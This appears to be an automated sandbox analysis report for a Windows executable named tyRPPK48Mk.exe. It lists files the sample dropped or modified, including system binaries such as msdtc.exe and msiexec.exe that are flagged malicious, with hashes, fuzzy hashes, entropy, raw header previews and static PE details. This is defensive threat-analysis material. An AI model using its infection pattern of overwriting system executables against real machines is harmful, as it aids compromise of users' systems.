                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163278369812904
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:iEP3R6wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:h6wsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D599A0860A654A2D629A56D388C66FA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2F0B147F6EFB4C4F5E92252895FBAEA60D34EB45
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:25E62CAAA71B807F5F942766697F66537566066F4BF80104C7B1E02598153464
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9620FB4C1A0819C652A525BED252147DBBFA57E7E0D036A3C5308976468BDE8A2ADDDB5A6E39A318C09766E19E0848FD249577645F90556D872BDA842CE5924F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................q..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Roaming\73722fd785394ff7.bin

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9832319607304445
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:DxU6s038BV9gvOque+nitNfxSvV1+riKJo2f6wqdltiNaJAnAhJSGq3prcAhCmD:+PtZiqLqSw0nKaeAhk6ry
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4F1C05505A2CDDDF191AA68A8099BE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8005FC381A9FED378DB6FC61A1C8B2FA040C81F2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7F500830F5323CD73CE407C6C0BD2BDD25EFA2F151794E149AE1B8CBFD9C6F30
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5FF1A7AFBF887856AADA76D323B721E91C539A527CAD9009D5BEA89AC4A69C18193FE05DA24AE9D99A9FBA7E43F67ACAFE96A227FB0FD059AAAFFB70EE4B42D0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:u...i...*H.O#.;:..R..x...^..."....D..!..0E~..[.5&...nW@.ea.Y.d................j...x.z3.TxNkh%K......*a.......9.....Z.p...........j..Z.*....."....{.....3@CZ7.....]...Q%... :......a.[...p.......M... ......5+....u..}.......d.x8.."`n.A...98..'..yp.yg...}.E...|.....:b.....>.0..."..6S..q.OW...T.....z.._<I..K..l..7n... s.....[.^.,.%....Sv...x....&..1F.h......J..f#......^.... c....m^..).lB..SOE.r*s.....(....4.@...8..%.M..Z....;+4C*.FG..Z9.B..2.)...c.|%g.....l...=....."..a....md.F..s....j..N. ...%C.{....L.Ek.J..O...`j...BS...a"s..Y.dLP...7}..}...!..|.x[G.../..{.Iv..0.a...<....S..N.z.........x.bu....$.l.O......]....6.&..Y^G...n.\..%Z..6-...9.......r.|h.Ap......+..A...P.4..Vd...P..t.....B......PA ..\g...t.*.U....{7.`ec.W..tB.-zQ.$..M}D...n..Gu|rvS.0:z.||..<....u.F?.........J1w.mj........9....&......{?.S...).......n...I..2..Wa.Z,..$r......,-.....Q .<....Y.Tn.0...^.&.7..2....S@.),j.n....\.......=?..s.l.X.U........,..'...v..,.A...V.)Z^O..1...

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1278464
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.142947191020223
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fjky/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fIy/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:80FB2A9AB41BBA2E660763723BD5C683
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:081D418C782F222A93B75445714C95B672D315D0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BCA54D5B6A32CBE9E67CBBA310FBE2D8BBB7D4BF1F978D7187F08619A9AB8B3B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:64FA5CB76EC53189975009779D07D1D0B3FA7F6CF6C0CFBBDD1DA862571BC068D8965FBDA12FF9791CCAB52EC27619D8EC8A4E6322E6A44A3123062028F6C18B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................%..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.083847920806543
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:k4DVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bVsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:41907E0ED9E79ACAC7D2B8B28F36CD56
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:671EF12F6A98807B5E710E086C6812319D44AF86
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C5504F0660886CD7561DF68D0E9BFE8213A79063413587796E19CD2B1FBC7670
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89BAB61A787BF1BE89AAC066CB61FED8D23E15107DD8A7881C29BCFD6A96C2238CF8374D5AF9AFDC20CF22626368553D974C61A3C5AC0A9BC961D2CE8B5EE2DA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................b..... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027541443591772
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:I9pXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:77032644518A6E344DB3C45614BB3462
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B981F4BECA4EF22D82D3CFF736C74EF8B5BC7F86
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4B88C34A9061EA3A076B629204DB5943DB43A96695F8B1F3733B30CAE55B7104
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7808984A10F47421CB91C0A8B34181FD0FD827D1D926ED009E5554CBE6CC1F4C04C0597A842FCD790FDAAD113E257EC4E54204E235B89B751D99BE96E26D82E3
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.......................................... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\sppsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5161984
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.25697813924847
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:iCLZqizFGeZV8ppBcq+NFabvy5FEz9AGkn7D527BWG:BLDzFGmVWQq+NFarCFUIn7VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2D7D8B9B8EBC3FD8E18A4B4F0032889D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:96A2EDC0BAE41970401B49E44487F31761310A87
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A6AC8E891E1878065B84347DC38353D4FE064C57A2C3620379101A305C562A0A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4135212440D2AD97D6881AA094DEA293B58C2EF511D48B8CADC5519586F14C97088B4B89234801F89C5E7A116BEAC7E891158DCE5F038149177A80EEDA976032
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u".j1C.91C.91C.9j+.80C.98;89)C.9%(.8(C.9%(.83C.9%(.8"C.91C.9-B.9%(.8.C.9%(.85C.9%(T90C.9%(.80C.9Rich1C.9........PE..d.....}'..........".......:......... ..........@................CS P......... O.......N..................................................... ;C.......E..+....D..z..................PFA.T.....................<.(.....<...............<. ............................text...rs9......t9................. ..`?g_Encry.-....9......x9............. ..`?g_Encry|-....9.......9............. ..`?g_Encry......9..0....9............. ..`?g_Encry.-... :.......:............. ..`.rdata.......P:......2:.............@..@.data...`....`C......>C.............@....pdata...z....D..|....C.............@..@.rsrc....+....E..,...HE.............@..@.reloc...`....E..P...tE.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\vds.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1303552
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.171549992264214
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:5Z0FxT1UoYr99GdcpKAsqjnhMgeiCl7G0nehbGZpbD:nwWc8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FD669AD0BA373802EC20BC543357973C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A0EAB5A9E2AE95F77C3A1CF5BCF6A4A55720F1DE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F6F3A48E1B663306B1BE692FEF7C251A45022EA6E6727D879677DEA99B3AA694
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:438D6E58CEDDC3886F6DCA7C3D1D54F0824C58E35054B7236522614454A3925A7C753BBD848E862C64B975CCF6D9937A5E87F9FECFB7A698EEE8053526C2498C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......R.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.269265325153089
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fyoKo2fRple9pnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:fyocJApnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E53A74818C63CB6204FD0B777E635867
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D66F85A3E2CBB30941C23BB5B8FA6B4FA22490F9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B4D6255F0E004E3062C7CC0DAFCA2CFE7FC2190FF549A4C96504C18C37346895
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FCCBC30380ED622FF4BB5ADFA32F6C13CA382FFB878BAAAB0A944BAB363C6A791DE1D5472C4B4FBA29148987D5FE64B47BA528EB9B1BDC8F18D7E072E1595181
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.....................................h.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2164736
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.062033530841207
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:KWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKnDmg27RnWGj:M0zuNIbD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C9F70CE234FCA9526C1C5BFCDAF44E2B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:73A398ED2D2771F347EAA1482F709C383CCE8567
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4982E00F483E77C694E7A15071846C5570EA1D1C422864AB440A23B82A712F85
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:693BA20F91C3FAA43B4808440CA52023BD35AE57EDDE52B9F9D58BA2F7885A63C06D9479BBDBEDD8A8C73DA988B50AAB880B3D365D572DBE843AFC582A51E3AA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....A1!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.09993063721293281
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:sOPSK3l/k/uMclF6vMclFq5zwvHNOn+SkUeYDwDzymWDQPSzj:stKV/kqF69Fq5z0O+pawHym6rv
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:00591B88304ABB80892235F0C24F7592
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A3218DBBDC64CAA2814C83980FF1D0F0CF58655B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FFA26E5B8A1D364D80B03B7449997422E83C683A615E32087726A8F394D822D0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:445D44F6195CAE3D9A3288F6F3CE527E8F15F10AA09517E0132F6821EF04FDF2855791A5050F35CFDC1886822F812BD2499DDE3A0DBE5440F02E6D124D0A4041
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....`...`.......................................`...!....................................Dx....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...........................H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P..........Dx....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.10151148916299792
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:Vl6UkW1K3l/k/uMclF6vMclFq5zwCANMu3n+SkUeYDwDzyMPDokW1zb:Vl6UkCKV/kqF69Fq5zhwX+pawHyyokCn
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E94BCC221CB64C69EC7904E7374AA481
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EB88DF3307DDEF1FFEC256DB0E0563022B62F2B6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0ACBD37B1E0BCF9282B350641C9DE65A2F9A9003060540E839B60F08FA79EC62
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CCC758B236BCB6820131C9C07CA1CA3D0AD75875B812C519948710DD4D498BD2ED805D5C511E5D6FA693379FE07B25530CE7D04E06671F7DFC56D0B90E9F8321
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....h...h.......................................h...!.....................................Ex....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...........................H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P...........Ex............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.09876442854763505
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:utlwK3Nk/uMclF6vMclFq5zw0E+HNIn+SkUeYDwDzyFDowzr:uwK9kqF69Fq5zu+tI+pawHyx53
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F17DF81028BF4539B048D46BFE54EB3A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2F63D6352343C3DF183F98C04A1B8F7DF008408D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F5F07C1DAEE639108292D2DFA86514DCDE46A3619A39C76D066959EF320ACD55
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7A2E4DF568E1E89FEE72C1796FA0D2E8421ACDBEC81D41746507CFEC645B860DF4FA430741E04F3D0DB7F53FFD206AF468A670BB7A6A11FA572FF1683326BE7C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....X...X.......................................X...!.....................................Dx....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............<..............H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P...........Dx............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.874408377679067
                                                                                                                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                                                                                                              File name:tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:94a2b51672c9fb20b8bc7ebfcbf648c0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:b6bf724c582f4467fb4d87108744cafbdbd1169b
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256:35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512:6dd9869686dfb6003a974e2130df1843e0fc78d31a8a246a6685192140d47b06a85483c47c4df01c56fad1d0eae8669e0b1befc47912446073e411fc16f079ed
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:7JZoQrbTFZY1iaCt55r1KX4wtxCliwzlGWm4FjNLlX1USl6G5tCaOOplYEawVubA:7trbTA1YKowvCrzkWm4Z3Ffl6+C8pXao
                                                                                                                                                                                                                                                                                                                                                                                                                              TLSH:72E51221F9C68036C2F267B09EBFF759963D66360336D19B27C82D351EA05417B2A723
                                                                                                                                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                                                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                                                                                                                                                                              Icon Hash:1733312925935517

                                                                                                                                                                                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint:0x4165c1
                                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem:windows gui
